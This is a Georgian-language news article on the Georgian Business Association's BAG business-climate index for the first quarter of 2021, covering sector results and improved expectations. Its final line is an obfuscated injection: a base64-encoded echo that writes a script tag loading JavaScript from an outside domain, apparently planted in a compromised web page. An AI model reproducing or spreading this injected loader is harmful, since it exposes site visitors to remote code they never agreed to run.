celsiusi
ავერსი შნაიდერი
საქართველოს ბიზნეს ასოციაცია BAG ინდექსის 2021 წლის პირველი კვარტლის შედეგებს აქვეყნებს, რომელიც საქართველოს ბიზნეს ასოციაციასთან თანამშრომლობით PMCG კვლევითმა ცენტრმა თებერვლის თვეში ჩატარებული კვლევის საფუძველზე მოამზადა.
 
როგორც „ბიზნესთაიმს“ საქართველოს ბიზნეს ასოციაციიდან აცნობეს, კვლევის თანახმად, 2021 წლის პირველს კვარტალში, წინა კვარტალთან შედარებით, ბიზნეს კლიმატის მაჩვენებელი, რომელიც ბიზნესის მიმდინარე მდგომარეობისა და მოლოდინის კომბინაციაა, მნიშვნელოვნად გაუმჯობესდა.
 
მათივე ცნობით, აღნიშნულ პერიოდში საქართველოს ბიზნეს ასოციაციის წევრი კომპანიების წარმომადგენლების მიერ როგორც მიმდინარე მდგომარეობის, ასევე მოლოდინის შეფასება გაუმჯობესდა. თუმცა, მიმდინარე მდგომარეობის მაჩვენებელი გაუმჯობესების მიუხედავად კვლავ ნეგატიური რჩება. ამავდროულად, ბიზნესი ინარჩუნებს პოზიტიურ მოლოდინს, რომელიც მნიშვნელოვნად, 34 პუნქტით არის გაუმჯობესებული. შედეგად, ბიზნეს კლიმატის მაჩვენებელი კვლავ აღმასვლის მეოთხედშია.
 
კვლევის ფარგლებში, BAG-ის წევრი კომპანიები იყოფა ოთხ სექტორად: ვაჭრობა, მომსახურება, მრეწველობა და მშენებლობა.
 
„2021 წლის I კვარტალში, BAG ბიზნეს კლიმატის მაჩვენებელი ყველა სექტორისთვის პოზიტიურია მშენებლობის სექტორის გარდა. აღნიშნული მშენებლობის სექტორში მიმდინარე მდგომარეობის ნეგატიური შეფასებით არის განპირობებული. მიმდინარე მდგომარეობას ნეგატიურად ვაჭრობისა და მომსახურების სექტორებიც აფასებს. თუმცა, აღსანიშნავია, რომ 2021 წლის I კვარტალში, 2020 წლის IV კვარტალთან შედარებით, ბიზნესის მიმდინარე მდგომარეობის შეფასება ყველა სექტორში გაუმჯობესდა მშენებლობის სექტორის გარდა.
 
2021 წლის I კვარტალში, ბიზნესის მომდევნო ექვსი თვის მოლოდინის მაჩვენებელი ყველა სექტორისთვის დადებითია. აღნიშნულ პერიოდში განსაკუთრებით ოპტიმისტური განწყობა დაფიქსირდა მომსახურებისა და ვაჭრობის სექტორში, რაც 2020 წლის ბოლოს დაწესებული შეზღუდვების ეტაპობრივ შემსუბუქებას უნდა დავუკავშიროთ.
 
BAG ინდექსი საქართველოს ბიზნეს ასოციაციის წევრების და მათ ჯგუფში შემავალი კომპანიების შეფასებას ემყარება. შესაბამისად, BAG ინდექსი წარმოადგენს საქართველოში ბიზნესგარემოს შეფასების მნიშვნელოვან ინდიკატორს, რომელსაც საქართველოს ბიზნეს ასოციაცია და PMCG კვლევითი ცენტრი IFO ეკონომიკური კვლევების გერმანული ინსტიტუტის მეთოდოლოგიაზე დაყრდნობით აწარმოებს“,- ნათქვამია ბიზნეს ასოციაციის მიერ გავრცელებულ ინფორმაციაში.
 
კვლევის ანგარიში შეგიძლიათ იხილოთ ბმულზე. https://bag.ge/file.helix?i=7d87fd5c-6379-45ab-a945-c10c7d0130a0&r=P
1336
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");